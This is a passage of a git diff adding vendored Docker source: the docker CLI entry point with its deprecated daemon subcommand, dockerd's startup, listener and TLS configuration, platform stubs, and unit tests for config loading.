*cobra.Command { + cmd := &cobra.Command{ + Use: "daemon", + Hidden: true, + Args: cobra.ArbitraryArgs, + DisableFlagParsing: true, + RunE: func(cmd *cobra.Command, args []string) error { + return runDaemon() + }, + Deprecated: "and will be removed in Docker 1.16. Please run `dockerd` directly.", + } + cmd.SetHelpFunc(helpFunc) + return cmd +} + +// CmdDaemon execs dockerd with the same flags +func runDaemon() error { + // Use os.Args[1:] so that "global" args are passed to dockerd + return execDaemon(stripDaemonArg(os.Args[1:])) +} + +func execDaemon(args []string) error { + binaryPath, err := findDaemonBinary() + if err != nil { + return err + } + + return syscall.Exec( + binaryPath, + append([]string{daemonBinary}, args...), + os.Environ()) +} + +func helpFunc(cmd *cobra.Command, args []string) { + if err := execDaemon([]string{"--help"}); err != nil { + fmt.Fprintf(os.Stderr, "%s\n", err.Error()) + } +} + +// findDaemonBinary looks for the path to the dockerd binary starting with +// the directory of the current executable (if one exists) and followed by $PATH +func findDaemonBinary() (string, error) { + execDirname := filepath.Dir(os.Args[0]) + if execDirname != "" { + binaryPath := filepath.Join(execDirname, daemonBinary) + if _, err := os.Stat(binaryPath); err == nil { + return binaryPath, nil + } + } + + return exec.LookPath(daemonBinary) +} + +// stripDaemonArg removes the `daemon` argument from the list +func stripDaemonArg(args []string) []string { + for i, arg := range args { + if arg == "daemon" { + return append(args[:i], args[i+1:]...) + } + } + return args +} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker.go b/vendor/github.com/docker/docker/cmd/docker/docker.go new file mode 100644 index 0000000000..d4847a90ee --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/docker.go @@ -0,0 +1,180 @@ +package main + +import ( + "errors" + "fmt" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/commands" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/term" + "github.com/docker/docker/utils" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +func newDockerCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := cliflags.NewClientOptions() + var flags *pflag.FlagSet + + cmd := &cobra.Command{ + Use: "docker [OPTIONS] COMMAND [ARG...]", + Short: "A self-sufficient runtime for containers", + SilenceUsage: true, + SilenceErrors: true, + TraverseChildren: true, + Args: noArgs, + RunE: func(cmd *cobra.Command, args []string) error { + if opts.Version { + showVersion() + return nil + } + return dockerCli.ShowHelp(cmd, args) + }, + PersistentPreRunE: func(cmd *cobra.Command, args []string) error { + // daemon command is special, we redirect directly to another binary + if cmd.Name() == "daemon" { + return nil + } + // flags must be the top-level command flags, not cmd.Flags() + opts.Common.SetDefaultOptions(flags) + dockerPreRun(opts) + if err := dockerCli.Initialize(opts); err != nil { + return err + } + return isSupported(cmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) + }, + } + cli.SetupRootCommand(cmd) + + cmd.SetHelpFunc(func(ccmd *cobra.Command, args []string) { + if dockerCli.Client() == nil { // when using --help, PersistenPreRun is not called, so initialization is needed. + // flags must be the top-level command flags, not cmd.Flags() + opts.Common.SetDefaultOptions(flags) + dockerPreRun(opts) + dockerCli.Initialize(opts) + } + + if err := isSupported(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()); err != nil { + ccmd.Println(err) + return + } + + hideUnsupportedFeatures(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) + + if err := ccmd.Help(); err != nil { + ccmd.Println(err) + } + }) + + flags = cmd.Flags() + flags.BoolVarP(&opts.Version, "version", "v", false, "Print version information and quit") + flags.StringVar(&opts.ConfigDir, "config", cliconfig.ConfigDir(), "Location of client config files") + opts.Common.InstallFlags(flags) + + cmd.SetOutput(dockerCli.Out()) + cmd.AddCommand(newDaemonCommand()) + commands.AddCommands(cmd, dockerCli) + + return cmd +} + +func noArgs(cmd *cobra.Command, args []string) error { + if len(args) == 0 { + return nil + } + return fmt.Errorf( + "docker: '%s' is not a docker command.\nSee 'docker --help'", args[0]) +} + +func main() { + // Set terminal emulation based on platform as required. + stdin, stdout, stderr := term.StdStreams() + logrus.SetOutput(stderr) + + dockerCli := command.NewDockerCli(stdin, stdout, stderr) + cmd := newDockerCommand(dockerCli) + + if err := cmd.Execute(); err != nil { + if sterr, ok := err.(cli.StatusError); ok { + if sterr.Status != "" { + fmt.Fprintln(stderr, sterr.Status) + } + // StatusError should only be used for errors, and all errors should + // have a non-zero exit status, so never exit with 0 + if sterr.StatusCode == 0 { + os.Exit(1) + } + os.Exit(sterr.StatusCode) + } + fmt.Fprintln(stderr, err) + os.Exit(1) + } +} + +func showVersion() { + fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) +} + +func dockerPreRun(opts *cliflags.ClientOptions) { + cliflags.SetLogLevel(opts.Common.LogLevel) + + if opts.ConfigDir != "" { + cliconfig.SetConfigDir(opts.ConfigDir) + } + + if opts.Common.Debug { + utils.EnableDebug() + } +} + +func hideUnsupportedFeatures(cmd *cobra.Command, clientVersion string, hasExperimental bool) { + cmd.Flags().VisitAll(func(f *pflag.Flag) { + // hide experimental flags + if !hasExperimental { + if _, ok := f.Annotations["experimental"]; ok { + f.Hidden = true + } + } + + // hide flags not supported by the server + if flagVersion, ok := f.Annotations["version"]; ok && len(flagVersion) == 1 && versions.LessThan(clientVersion, flagVersion[0]) { + f.Hidden = true + } + + }) + + for _, subcmd := range cmd.Commands() { + // hide experimental subcommands + if !hasExperimental { + if _, ok := subcmd.Tags["experimental"]; ok { + subcmd.Hidden = true + } + } + + // hide subcommands not supported by the server + if subcmdVersion, ok := subcmd.Tags["version"]; ok && versions.LessThan(clientVersion, subcmdVersion) { + subcmd.Hidden = true + } + } +} + +func isSupported(cmd *cobra.Command, clientVersion string, hasExperimental bool) error { + if !hasExperimental { + if _, ok := cmd.Tags["experimental"]; ok { + return errors.New("only supported with experimental daemon") + } + } + + if cmdVersion, ok := cmd.Tags["version"]; ok && versions.LessThan(clientVersion, cmdVersion) { + return fmt.Errorf("only supported with daemon version >= %s", cmdVersion) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_test.go b/vendor/github.com/docker/docker/cmd/docker/docker_test.go new file mode 100644 index 0000000000..8738f6005d --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/docker_test.go @@ -0,0 +1,32 @@ +package main + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/utils" +) + +func TestClientDebugEnabled(t *testing.T) { + defer utils.DisableDebug() + + cmd := newDockerCommand(&command.DockerCli{}) + cmd.Flags().Set("debug", "true") + + err := cmd.PersistentPreRunE(cmd, []string{}) + assert.NilError(t, err) + assert.Equal(t, os.Getenv("DEBUG"), "1") + assert.Equal(t, logrus.GetLevel(), logrus.DebugLevel) +} + +func TestExitStatusForInvalidSubcommandWithHelpFlag(t *testing.T) { + discard := ioutil.Discard + cmd := newDockerCommand(command.NewDockerCli(os.Stdin, discard, discard)) + cmd.SetArgs([]string{"help", "invalid"}) + err := cmd.Execute() + assert.Error(t, err, "unknown help topic: invalid") +} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go new file mode 100644 index 0000000000..9bc507e20c --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go @@ -0,0 +1,18 @@ +package main + +import ( + "sync/atomic" + + _ "github.com/docker/docker/autogen/winresources/docker" +) + +//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" + +var dummy uintptr + +func init() { + // Ensure that this import is not removed by the linker. This is used to + // ensure that shell32.dll is loaded by the system loader, preventing + // go#15286 from triggering on Nano Server TP5. + atomic.LoadUintptr(&dummy) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/README.md b/vendor/github.com/docker/docker/cmd/dockerd/README.md new file mode 100644 index 0000000000..a8c20b3549 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/README.md @@ -0,0 +1,3 @@ +docker.go contains Docker daemon's main function. + +This file provides first line CLI argument parsing and environment variable setting. diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go new file mode 100644 index 0000000000..2f099e0199 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go @@ -0,0 +1,524 @@ +package main + +import ( + "crypto/tls" + "fmt" + "io" + "os" + "path/filepath" + "runtime" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/uuid" + "github.com/docker/docker/api" + apiserver "github.com/docker/docker/api/server" + "github.com/docker/docker/api/server/middleware" + "github.com/docker/docker/api/server/router" + "github.com/docker/docker/api/server/router/build" + checkpointrouter "github.com/docker/docker/api/server/router/checkpoint" + "github.com/docker/docker/api/server/router/container" + "github.com/docker/docker/api/server/router/image" + "github.com/docker/docker/api/server/router/network" + pluginrouter "github.com/docker/docker/api/server/router/plugin" + swarmrouter "github.com/docker/docker/api/server/router/swarm" + systemrouter "github.com/docker/docker/api/server/router/system" + "github.com/docker/docker/api/server/router/volume" + "github.com/docker/docker/builder/dockerfile" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/daemon" + "github.com/docker/docker/daemon/cluster" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/libcontainerd" + dopts "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/authorization" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/listeners" + "github.com/docker/docker/pkg/pidfile" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/registry" + "github.com/docker/docker/runconfig" + "github.com/docker/docker/utils" + "github.com/docker/go-connections/tlsconfig" + "github.com/spf13/pflag" +) + +const ( + flagDaemonConfigFile = "config-file" +) + +// DaemonCli represents the daemon CLI. +type DaemonCli struct { + *daemon.Config + configFile *string + flags *pflag.FlagSet + + api *apiserver.Server + d *daemon.Daemon + authzMiddleware *authorization.Middleware // authzMiddleware enables to dynamically reload the authorization plugins +} + +// NewDaemonCli returns a daemon CLI +func NewDaemonCli() *DaemonCli { + return &DaemonCli{} +} + +func migrateKey(config *daemon.Config) (err error) { + // No migration necessary on Windows + if runtime.GOOS == "windows" { + return nil + } + + // Migrate trust key if exists at ~/.docker/key.json and owned by current user + oldPath := filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) + newPath := filepath.Join(getDaemonConfDir(config.Root), cliflags.DefaultTrustKeyFile) + if _, statErr := os.Stat(newPath); os.IsNotExist(statErr) && currentUserIsOwner(oldPath) { + defer func() { + // Ensure old path is removed if no error occurred + if err == nil { + err = os.Remove(oldPath) + } else { + logrus.Warnf("Key migration failed, key file not removed at %s", oldPath) + os.Remove(newPath) + } + }() + + if err := system.MkdirAll(getDaemonConfDir(config.Root), os.FileMode(0644)); err != nil { + return fmt.Errorf("Unable to create daemon configuration directory: %s", err) + } + + newFile, err := os.OpenFile(newPath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600) + if err != nil { + return fmt.Errorf("error creating key file %q: %s", newPath, err) + } + defer newFile.Close() + + oldFile, err := os.Open(oldPath) + if err != nil { + return fmt.Errorf("error opening key file %q: %s", oldPath, err) + } + defer oldFile.Close() + + if _, err := io.Copy(newFile, oldFile); err != nil { + return fmt.Errorf("error copying key: %s", err) + } + + logrus.Infof("Migrated key from %s to %s", oldPath, newPath) + } + + return nil +} + +func (cli *DaemonCli) start(opts daemonOptions) (err error) { + stopc := make(chan bool) + defer close(stopc) + + // warn from uuid package when running the daemon + uuid.Loggerf = logrus.Warnf + + opts.common.SetDefaultOptions(opts.flags) + + if cli.Config, err = loadDaemonCliConfig(opts); err != nil { + return err + } + cli.configFile = &opts.configFile + cli.flags = opts.flags + + if opts.common.TrustKey == "" { + opts.common.TrustKey = filepath.Join( + getDaemonConfDir(cli.Config.Root), + cliflags.DefaultTrustKeyFile) + } + + if cli.Config.Debug { + utils.EnableDebug() + } + + if cli.Config.Experimental { + logrus.Warn("Running experimental build") + } + + logrus.SetFormatter(&logrus.TextFormatter{ + TimestampFormat: jsonlog.RFC3339NanoFixed, + DisableColors: cli.Config.RawLogs, + }) + + if err := setDefaultUmask(); err != nil { + return fmt.Errorf("Failed to set umask: %v", err) + } + + if len(cli.LogConfig.Config) > 0 { + if err := logger.ValidateLogOpts(cli.LogConfig.Type, cli.LogConfig.Config); err != nil { + return fmt.Errorf("Failed to set log opts: %v", err) + } + } + + // Create the daemon root before we create ANY other files (PID, or migrate keys) + // to ensure the appropriate ACL is set (particularly relevant on Windows) + if err := daemon.CreateDaemonRoot(cli.Config); err != nil { + return err + } + + if cli.Pidfile != "" { + pf, err := pidfile.New(cli.Pidfile) + if err != nil { + return fmt.Errorf("Error starting daemon: %v", err) + } + defer func() { + if err := pf.Remove(); err != nil { + logrus.Error(err) + } + }() + } + + serverConfig := &apiserver.Config{ + Logging: true, + SocketGroup: cli.Config.SocketGroup, + Version: dockerversion.Version, + EnableCors: cli.Config.EnableCors, + CorsHeaders: cli.Config.CorsHeaders, + } + + if cli.Config.TLS { + tlsOptions := tlsconfig.Options{ + CAFile: cli.Config.CommonTLSOptions.CAFile, + CertFile: cli.Config.CommonTLSOptions.CertFile, + KeyFile: cli.Config.CommonTLSOptions.KeyFile, + } + + if cli.Config.TLSVerify { + // server requires and verifies client's certificate + tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert + } + tlsConfig, err := tlsconfig.Server(tlsOptions) + if err != nil { + return err + } + serverConfig.TLSConfig = tlsConfig + } + + if len(cli.Config.Hosts) == 0 { + cli.Config.Hosts = make([]string, 1) + } + + api := apiserver.New(serverConfig) + cli.api = api + + for i := 0; i < len(cli.Config.Hosts); i++ { + var err error + if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil { + return fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err) + } + + protoAddr := cli.Config.Hosts[i] + protoAddrParts := strings.SplitN(protoAddr, "://", 2) + if len(protoAddrParts) != 2 { + return fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr) + } + + proto := protoAddrParts[0] + addr := protoAddrParts[1] + + // It's a bad idea to bind to TCP without tlsverify. + if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) { + logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting -tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]") + } + ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig) + if err != nil { + return err + } + ls = wrapListeners(proto, ls) + // If we're binding to a TCP port, make sure that a container doesn't try to use it. + if proto == "tcp" { + if err := allocateDaemonPort(addr); err != nil { + return err + } + } + logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr) + api.Accept(addr, ls...) + } + + if err := migrateKey(cli.Config); err != nil { + return err + } + + // FIXME: why is this down here instead of with the other TrustKey logic above? + cli.TrustKeyPath = opts.common.TrustKey + + registryService := registry.NewService(cli.Config.ServiceOptions) + containerdRemote, err := libcontainerd.New(cli.getLibcontainerdRoot(), cli.getPlatformRemoteOptions()...) + if err != nil { + return err + } + signal.Trap(func() { + cli.stop() + <-stopc // wait for daemonCli.start() to return + }) + + d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote) + if err != nil { + return fmt.Errorf("Error starting daemon: %v", err) + } + + if cli.Config.MetricsAddress != "" { + if !d.HasExperimental() { + return fmt.Errorf("metrics-addr is only supported when experimental is enabled") + } + if err := startMetricsServer(cli.Config.MetricsAddress); err != nil { + return err + } + } + + name, _ := os.Hostname() + + c, err := cluster.New(cluster.Config{ + Root: cli.Config.Root, + Name: name, + Backend: d, + NetworkSubnetsProvider: d, + DefaultAdvertiseAddr: cli.Config.SwarmDefaultAdvertiseAddr, + RuntimeRoot: cli.getSwarmRunRoot(), + }) + if err != nil { + logrus.Fatalf("Error creating cluster component: %v", err) + } + + // Restart all autostart containers which has a swarm endpoint + // and is not yet running now that we have successfully + // initialized the cluster. + d.RestartSwarmContainers() + + logrus.Info("Daemon has completed initialization") + + logrus.WithFields(logrus.Fields{ + "version": dockerversion.Version, + "commit": dockerversion.GitCommit, + "graphdriver": d.GraphDriverName(), + }).Info("Docker daemon") + + cli.d = d + + // initMiddlewares needs cli.d to be populated. Dont change this init order. + if err := cli.initMiddlewares(api, serverConfig); err != nil { + logrus.Fatalf("Error creating middlewares: %v", err) + } + d.SetCluster(c) + initRouter(api, d, c) + + cli.setupConfigReloadTrap() + + // The serve API routine never exits unless an error occurs + // We need to start it as a goroutine and wait on it so + // daemon doesn't exit + serveAPIWait := make(chan error) + go api.Wait(serveAPIWait) + + // after the daemon is done setting up we can notify systemd api + notifySystem() + + // Daemon is fully initialized and handling API traffic + // Wait for serve API to complete + errAPI := <-serveAPIWait + c.Cleanup() + shutdownDaemon(d) + containerdRemote.Cleanup() + if errAPI != nil { + return fmt.Errorf("Shutting down due to ServeAPI error: %v", errAPI) + } + + return nil +} + +func (cli *DaemonCli) reloadConfig() { + reload := func(config *daemon.Config) { + + // Revalidate and reload the authorization plugins + if err := validateAuthzPlugins(config.AuthorizationPlugins, cli.d.PluginStore); err != nil { + logrus.Fatalf("Error validating authorization plugin: %v", err) + return + } + cli.authzMiddleware.SetPlugins(config.AuthorizationPlugins) + + if err := cli.d.Reload(config); err != nil { + logrus.Errorf("Error reconfiguring the daemon: %v", err) + return + } + + if config.IsValueSet("debug") { + debugEnabled := utils.IsDebugEnabled() + switch { + case debugEnabled && !config.Debug: // disable debug + utils.DisableDebug() + cli.api.DisableProfiler() + case config.Debug && !debugEnabled: // enable debug + utils.EnableDebug() + cli.api.EnableProfiler() + } + + } + } + + if err := daemon.ReloadConfiguration(*cli.configFile, cli.flags, reload); err != nil { + logrus.Error(err) + } +} + +func (cli *DaemonCli) stop() { + cli.api.Close() +} + +// shutdownDaemon just wraps daemon.Shutdown() to handle a timeout in case +// d.Shutdown() is waiting too long to kill container or worst it's +// blocked there +func shutdownDaemon(d *daemon.Daemon) { + shutdownTimeout := d.ShutdownTimeout() + ch := make(chan struct{}) + go func() { + d.Shutdown() + close(ch) + }() + if shutdownTimeout < 0 { + <-ch + logrus.Debug("Clean shutdown succeeded") + return + } + select { + case <-ch: + logrus.Debug("Clean shutdown succeeded") + case <-time.After(time.Duration(shutdownTimeout) * time.Second): + logrus.Error("Force shutdown daemon") + } +} + +func loadDaemonCliConfig(opts daemonOptions) (*daemon.Config, error) { + config := opts.daemonConfig + flags := opts.flags + config.Debug = opts.common.Debug + config.Hosts = opts.common.Hosts + config.LogLevel = opts.common.LogLevel + config.TLS = opts.common.TLS + config.TLSVerify = opts.common.TLSVerify + config.CommonTLSOptions = daemon.CommonTLSOptions{} + + if opts.common.TLSOptions != nil { + config.CommonTLSOptions.CAFile = opts.common.TLSOptions.CAFile + config.CommonTLSOptions.CertFile = opts.common.TLSOptions.CertFile + config.CommonTLSOptions.KeyFile = opts.common.TLSOptions.KeyFile + } + + if opts.configFile != "" { + c, err := daemon.MergeDaemonConfigurations(config, flags, opts.configFile) + if err != nil { + if flags.Changed(flagDaemonConfigFile) || !os.IsNotExist(err) { + return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v\n", opts.configFile, err) + } + } + // the merged configuration can be nil if the config file didn't exist. + // leave the current configuration as it is if when that happens. + if c != nil { + config = c + } + } + + if err := daemon.ValidateConfiguration(config); err != nil { + return nil, err + } + + // Labels of the docker engine used to allow multiple values associated with the same key. + // This is deprecated in 1.13, and, be removed after 3 release cycles. + // The following will check the conflict of labels, and report a warning for deprecation. + // + // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be + // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): + // + // newLabels, err := daemon.GetConflictFreeLabels(config.Labels) + // if err != nil { + // return nil, err + // } + // config.Labels = newLabels + // + if _, err := daemon.GetConflictFreeLabels(config.Labels); err != nil { + logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + } + + // Regardless of whether the user sets it to true or false, if they + // specify TLSVerify at all then we need to turn on TLS + if config.IsValueSet(cliflags.FlagTLSVerify) { + config.TLS = true + } + + // ensure that the log level is the one set after merging configurations + cliflags.SetLogLevel(config.LogLevel) + + return config, nil +} + +func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) { + decoder := runconfig.ContainerDecoder{} + + routers := []router.Router{ + // we need to add the checkpoint router before the container router or the DELETE gets masked + checkpointrouter.NewRouter(d, decoder), + container.NewRouter(d, decoder), + image.NewRouter(d, decoder), + systemrouter.NewRouter(d, c), + volume.NewRouter(d), + build.NewRouter(dockerfile.NewBuildManager(d)), + swarmrouter.NewRouter(c), + pluginrouter.NewRouter(d.PluginManager()), + } + + if d.NetworkControllerEnabled() { + routers = append(routers, network.NewRouter(d, c)) + } + + if d.HasExperimental() { + for _, r := range routers { + for _, route := range r.Routes() { + if experimental, ok := route.(router.ExperimentalRoute); ok { + experimental.Enable() + } + } + } + } + + s.InitRouter(utils.IsDebugEnabled(), routers...) +} + +func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config) error { + v := cfg.Version + + exp := middleware.NewExperimentalMiddleware(cli.d.HasExperimental()) + s.UseMiddleware(exp) + + vm := middleware.NewVersionMiddleware(v, api.DefaultVersion, api.MinVersion) + s.UseMiddleware(vm) + + if cfg.EnableCors { + c := middleware.NewCORSMiddleware(cfg.CorsHeaders) + s.UseMiddleware(c) + } + + if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, cli.d.PluginStore); err != nil { + return fmt.Errorf("Error validating authorization plugin: %v", err) + } + cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, cli.d.PluginStore) + s.UseMiddleware(cli.authzMiddleware) + return nil +} + +// validates that the plugins requested with the --authorization-plugin flag are valid AuthzDriver +// plugins present on the host and available to the daemon +func validateAuthzPlugins(requestedPlugins []string, pg plugingetter.PluginGetter) error { + for _, reqPlugin := range requestedPlugins { + if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.LOOKUP); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go new file mode 100644 index 0000000000..623aaf4b09 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go @@ -0,0 +1,5 @@ +package main + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go new file mode 100644 index 0000000000..a556daa187 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go @@ -0,0 +1,11 @@ +// +build linux + +package main + +import systemdDaemon "github.com/coreos/go-systemd/daemon" + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { + // Tell the init daemon we are accepting requests + go systemdDaemon.SdNotify("READY=1") +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go new file mode 100644 index 0000000000..974ba16345 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go @@ -0,0 +1,85 @@ +// +build solaris + +package main + +import ( + "fmt" + "net" + "os" + "path/filepath" + "syscall" + + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/system" +) + +const defaultDaemonConfigFile = "" + +// currentUserIsOwner checks whether the current user is the owner of the given +// file. +func currentUserIsOwner(f string) bool { + if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { + if int(fileInfo.UID()) == os.Getuid() { + return true + } + } + return false +} + +// setDefaultUmask sets the umask to 0022 to avoid problems +// caused by custom umask +func setDefaultUmask() error { + desiredUmask := 0022 + syscall.Umask(desiredUmask) + if umask := syscall.Umask(desiredUmask); umask != desiredUmask { + return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) + } + + return nil +} + +func getDaemonConfDir(_ string) string { + return "/etc/docker" +} + +// setupConfigReloadTrap configures the USR2 signal to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { +} + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { +} + +func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { + opts := []libcontainerd.RemoteOption{} + if cli.Config.ContainerdAddr != "" { + opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) + } else { + opts = append(opts, libcontainerd.WithStartDaemon(true)) + } + return opts +} + +// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to +// store their state. +func (cli *DaemonCli) getLibcontainerdRoot() string { + return filepath.Join(cli.Config.ExecRoot, "libcontainerd") +} + +// getSwarmRunRoot gets the root directory for swarm to store runtime state +// For example, the control socket +func (cli *DaemonCli) getSwarmRunRoot() string { + return filepath.Join(cli.Config.ExecRoot, "swarm") +} + +func allocateDaemonPort(addr string) error { + return nil +} + +// notifyShutdown is called after the daemon shuts down but before the process exits. +func notifyShutdown(err error) { +} + +func wrapListeners(proto string, ls []net.Listener) []net.Listener { + return ls +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go new file mode 100644 index 0000000000..b364f87843 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go @@ -0,0 +1,145 @@ +package main + +import ( + "testing" + + "github.com/Sirupsen/logrus" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/daemon" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/pkg/testutil/tempfile" + "github.com/spf13/pflag" +) + +func defaultOptions(configFile string) daemonOptions { + opts := daemonOptions{ + daemonConfig: &daemon.Config{}, + flags: &pflag.FlagSet{}, + common: cliflags.NewCommonOptions(), + } + opts.common.InstallFlags(opts.flags) + opts.daemonConfig.InstallFlags(opts.flags) + opts.flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "") + opts.configFile = configFile + return opts +} + +func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) { + opts := defaultOptions("") + opts.common.Debug = true + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + if !loadedConfig.Debug { + t.Fatalf("expected debug to be copied from the common flags, got false") + } +} + +func TestLoadDaemonCliConfigWithTLS(t *testing.T) { + opts := defaultOptions("") + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts.common.TLS = true + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/tmp/ca.pem") +} + +func TestLoadDaemonCliConfigWithConflicts(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"labels": ["l3=foo"]}`) + defer tempFile.Remove() + configFile := tempFile.Name() + + opts := defaultOptions(configFile) + flags := opts.flags + + assert.NilError(t, flags.Set(flagDaemonConfigFile, configFile)) + assert.NilError(t, flags.Set("label", "l1=bar")) + assert.NilError(t, flags.Set("label", "l2=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Error(t, err, "as a flag and in the configuration file: labels") +} + +func TestLoadDaemonCliConfigWithTLSVerify(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": true}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.TLS, true) +} + +func TestLoadDaemonCliConfigWithExplicitTLSVerifyFalse(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": false}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.TLS, true) +} + +func TestLoadDaemonCliConfigWithoutTLSVerify(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.TLS, false) +} + +func TestLoadDaemonCliConfigWithLogLevel(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"log-level": "warn"}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.LogLevel, "warn") + assert.Equal(t, logrus.GetLevel(), logrus.WarnLevel) +} + +func TestLoadDaemonConfigWithEmbeddedOptions(t *testing.T) { + content := `{"tlscacert": "/etc/certs/ca.pem", 